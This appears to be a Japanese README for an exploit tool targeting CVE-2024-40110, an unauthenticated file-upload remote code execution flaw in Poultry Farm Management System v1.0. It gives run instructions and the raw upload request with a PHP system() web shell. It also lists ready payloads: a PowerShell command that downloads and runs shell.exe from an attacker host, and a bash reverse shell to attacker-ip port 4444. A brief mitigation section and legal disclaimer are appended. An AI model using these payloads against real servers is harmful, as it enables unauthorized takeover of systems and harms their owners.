
Poultry Farm Management System v1.0のCVE-2024-40110のエクスプロイト。認証なしのファイルアップロードRCEです。PHPシェルをアップロードして、ターゲット上で任意のコマンドを実行します。
認証不要のファイルアップロードによるリモートコード実行
Poultry Farm Management System v1.0 には、商品アップロード機能に重大な脆弱性が存在します。このアプリケーションはファイルアップロードの検証とサニタイズを適切に行っていないため、攻撃者は商品画像を装ったPHPファイルをアップロードすることができます。アップロードされたPHPファイルは実行可能であり、リモートコード実行を達成できます。
POST /paultry/farm/product.php または POST /farm/product.php
この脆弱性は以下の方法で悪用できます:
requests ライブラリcolorama ライブラリ (カラー出力用)pip install requests colorama
またはすべての依存関係をインストール:
pip install -r requirements.txt
スクリプトを対話的に実行:
python exploit.py
スクリプトは以下の入力を求めます:
==================================================
対話型バックドアアップロードツール
==================================================
ターゲットIPアドレスを入力: 192.168.1.100
ターゲットポートを入力 (デフォルト: 80): 8080
実行するコマンドを入力 (デフォルト: powershellペイロード):
コマンド: whoami
==================================================
確認
==================================================
ターゲットURL: http://192.168.1.100:8080
コマンド: whoami
続行しますか? (yes/no): yes
✅ 対話型入力 - IP、ポート、カスタムコマンドを入力
✅ デフォルト値 - 便利なデフォルト値
✅ カラー表示の出力 - 読みやすいカラー端末出力
✅ 確認ステップ - 実行前に設定を確認
✅ エラーハンドリング - 失敗したリクエストに対する適切なエラーメッセージ
✅ 柔軟なコマンド - 任意のシェルコマンドまたはPowerShellペイロードに対応
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"
bash -i >& /dev/tcp/attacker-ip/4444 0>&1
whoami
id
ifconfig
hostname
pwd
/assets/img/productimages/ に保存されるsystem() 関数を介してコマンドが実行されるPOST /paultry/farm/product.php
Content-Type: multipart/form-data
category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]
<?php system('COMMAND_HERE');?>
このエクスプロイトは以下でテスト済み:
⚠️ 法的注意
このツールは許可されたセキュリティテストおよび教育目的のみで提供されています。コンピュータシステムへの不正アクセスは違法です。
ソフトウェアの更新 - 利用可能な場合はセキュリティパッチを適用
ファイルアップロードの検証
設定
<Directory /uploads>
php_flag engine off
AddType text/plain .php .phtml .php3 .php4 .php5 .phar
</Directory>
アクセス制御
監視
エラー: 接続が拒否されました
解決策: ターゲットのIPとポートが正しいこと、アプリケーションが実行中であることを確認してください
エラー: シェルのアップロードに失敗しました。ステータスコード: 404
解決策: エンドポイントのパスが異なる可能性があります。一般的なパス: /farm/、/paultry/farm/
エラー: コマンド出力が空です
解決策: PHPの実行が無効になっているか、ファイルが正しくアップロードされていない可能性があります
問題、質問、改善については、GitHubリポジトリまたはExploit-DBページを参照してください。
最終更新日: 2024年12月
ステータス: 検証済み、テスト済み